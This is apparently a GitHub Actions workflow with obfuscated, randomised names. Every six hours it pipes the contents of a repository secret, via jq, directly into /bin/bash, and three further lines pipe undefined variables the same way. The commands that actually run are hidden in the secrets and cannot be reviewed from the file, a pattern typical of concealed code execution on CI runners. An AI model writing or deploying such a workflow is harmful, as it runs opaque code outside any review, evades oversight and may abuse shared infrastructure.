name: xuzhibai3856
on:
  workflow_dispatch:
  schedule:
    - cron: '12 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xuzhibai3856
        env:
          b30: ${{ secrets.b30 }}
        run: |
          echo $b30 | jq -r .cje5 | /bin/bash
          echo $whznq2 | jq -r .mp60 | /bin/bash
          echo $tb056 | jq -r .ecy77130 | /bin/bash
          echo $vulsd69389 | jq -r .pole61 | /bin/bash

